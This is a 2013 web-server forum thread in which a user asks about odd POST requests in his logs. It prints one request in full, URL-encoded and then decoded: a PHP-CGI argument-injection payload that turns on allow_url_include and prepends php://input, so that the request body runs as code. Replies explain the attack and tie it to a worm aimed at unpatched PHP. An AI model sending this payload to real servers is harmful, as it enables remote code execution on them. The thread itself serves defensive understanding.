| Author |
|
Doug22
Joined: 02 Jun 2013
Posts: 57
Location: Houston TX
|
 Posted: Mon 16 Dec '13 1:14 Post subject: what's going on here? |
 |
|
Just out of curiosity, I've been starting to see a lot of these POST requests in my log from various sites (mostly suspect international ones, but not this one). I used to see them only occasionally, but I'm now seeing a few per day. They are rejected of course by my server, but what's it about? What are they trying to do?
| Code: |
54.226.0.214 - - [14/Dec/2013:06:35:32 -0600] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65
%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%
2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%
6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74
%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6
4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%
65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%7
4+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%6
3%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%7
3%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 217
|
|
|
| Back to top |
|
glsmith
Moderator
Joined: 16 Oct 2007
Posts: 2268
Location: Sun Diego, USA
|
| Posted: Mon 16 Dec '13 4:50 Post subject: |
|
|
| run all that junk after the php? in a URL decoder and you'll get a pretty good idea |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7373
Location: Germany, Next to Hamburg
|
| Posted: Mon 16 Dec '13 10:40 Post subject: |
|
|
Well it is a try to attack PHP which runs under plain cgi. The parameters are
| Code: |
-dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions=""-dopen_basedir=none-dauto_prepend_file=php://input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-n
|
|
|
| Back to top |
|
Doug22
Joined: 02 Jun 2013
Posts: 57
Location: Houston TX
|
| Posted: Mon 16 Dec '13 21:44 Post subject: |
|
|
| Well, I'm not sure that gives me a pretty good idea of what they're trying to accomplish, though it is clear that it is some sort of attack. Thanks. |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7373
Location: Germany, Next to Hamburg
|
| Posted: Tue 17 Dec '13 11:43 Post subject: |
|
|
| Doug22 wrote: | | Well, I'm not sure that gives me a pretty good idea of what they're trying to accomplish, though it is clear that it is some sort of attack. Thanks. |
well each -d is for define. So the attacker tried to override some of your php.ini settings. Like allow_url_include to on. |
|
| Back to top |
|
Anaksunaman
Joined: 19 Dec 2013
Posts: 54
|
| Posted: Sat 21 Dec '13 12:40 Post subject: Attack on older versions of PHP |
|
|
It's very likely the Linux.Darlloz worm. This worm has shown itself recently, trying to exploit devices with older versions of PHP installed (such as routers, etc.) in for some as yet unknown reason. And while I can't say for certain, I have seen a few example logs of this worm that look very close to what you posted.
The security hole it tries to exploit was patched in May 2012, so for newer versions of PHP, you should be fine.
http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices |
|
| Back to top |
|
